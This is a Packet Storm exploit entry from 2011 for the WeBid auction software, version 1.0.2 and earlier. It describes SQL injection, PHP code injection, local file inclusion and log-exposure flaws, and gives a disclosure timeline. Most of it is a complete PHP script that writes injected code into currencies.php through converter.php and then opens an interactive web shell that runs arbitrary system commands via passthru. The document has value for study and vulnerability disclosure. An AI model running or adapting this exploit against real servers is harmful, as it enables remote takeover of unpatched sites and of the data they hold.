WeBid 1.0.2 Remote Code Execution

2011-07-04T00:00:00
ID PACKETSTORM:102756
Type packetstorm
Reporter EgiX
Modified 2011-07-04T00:00:00

Description

                                        
                                            `<?php  
  
/*  
  
------------------------------------------------------------  
WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit  
------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
link.....: http://www.webidsupport.com/  
  
  
This PoC was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
  
[-] Vulnerable code to SQL injection in feedback.php:  
  
154. $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";  
155. $res = mysql_query($query);  
156. $system->check_mysql($res, $query, __LINE__, __FILE__);  
157. $item_title = mysql_result($res, 0, 'title');  
  
Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.  
  
[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:  
  
21. if (isset($_COOKIE['WEBID_RM_ID']))  
22. {  
23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";  
24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);  
25. setcookie('WEBID_RM_ID', '', time() - 3600);  
26. }  
  
Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.  
  
  
[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:  
  
84. if (isset($_COOKIE['WEBID_ONLINE']))  
85. {  
86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";  
87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);  
88. }  
  
Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.  
  
[-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:  
  
61. function buildcache($newaarray)  
62. {  
63. global $include_path;  
64.  
65. $output_filename = $include_path . 'currencies.php';  
66. $output = "<?php\n";  
67. $output.= "\$conversionarray[] = '" . time() . "';\n";  
68. $output.= "\$conversionarray[] = array(\n";  
69.  
70. for ($i = 0; $i < count($newaarray); $i++)  
71. {  
72. $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";  
73. if ($i < (count($newaarray) - 1))  
74. {  
75. $output .= ",\n";  
76. }  
77. else  
78. {  
79. $output .= "\n";  
80. }  
81. }  
82.  
83. $output .= ");\n?>\n";  
84.  
85. $handle = fopen($output_filename, 'w');  
86. fputs($handle, $output);  
87. fclose($handle);  
88. }  
  
Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being  
written to currencies.php file, this can lead to arbitrary PHP code injection.  
  
[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:  
  
18. if (isset($_GET['lan']) && !empty($_GET['lan']))  
19. {  
20. if ($user->logged_in)  
21. {  
22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];  
23. }  
24. else  
25. {  
26. // Set language cookie  
27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');  
28. }  
29. $language = $_GET['lan'];  
30. }  
31. elseif ($user->logged_in)  
32. {  
33. $language = $user->user_data['language'];  
34. }  
35. elseif (isset($_COOKIE['USERLANGUAGE']))  
36. {  
37. $language = $_COOKIE['USERLANGUAGE'];  
38. }  
39. else  
40. {  
41. $language = $system->SETTINGS['defaultlanguage'];  
42. }  
43.  
44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];  
45.  
46. include $main_path . 'language/' . $language . '/messages.inc.php';  
  
Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before  
  
being used to include files on line 46. This can be exploited to include arbitrary local files.  
  
[-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log  
  
  
[-] Disclosure timeline:  
  
[19/06/2011] - Vulnerabilities discovered  
[19/06/2011] - Vendor contacted  
[20/06/2011] - Vendor contacted again  
[21/06/2011] - No response from vendor  
[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34  
[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1  
[22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892  
[04/07/2011] - Public disclosure  
  
*/  
  
error_reporting(E_ERROR);  
set_time_limit(0);  
  
if (!extension_loaded("curl")) die("cURL extension required\n");  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_HEADER, 1);  
curl_setopt($ch, CURLOPT_VERBOSE, 0);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  
  
function http_post($page, $data)  
{   
global $ch, $url;  
  
curl_setopt($ch, CURLOPT_URL, $url.$page);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
  
return curl_exec($ch);  
}  
  
print "\n+----------------------------------------------------------------------+";  
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";  
print "\n+----------------------------------------------------------------------+\n";  
  
if ($argc < 2)  
{  
print "\nUsage......: php $argv[0] <url>\n";  
print "\nExample....: php $argv[0] https://localhost/";  
print "\nExample....: php $argv[0] http://localhost/webid/\n";  
die();  
}  
  
$url = $argv[1];  
  
$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");  
http_post("converter.php", "action=convert&from=USD&to={$code}");  
  
while(1)  
{  
print "\nwebid-shell# ";  
if (($cmd = trim(fgets(STDIN))) == "exit") break;  
preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");  
}  
?>  
  
  
`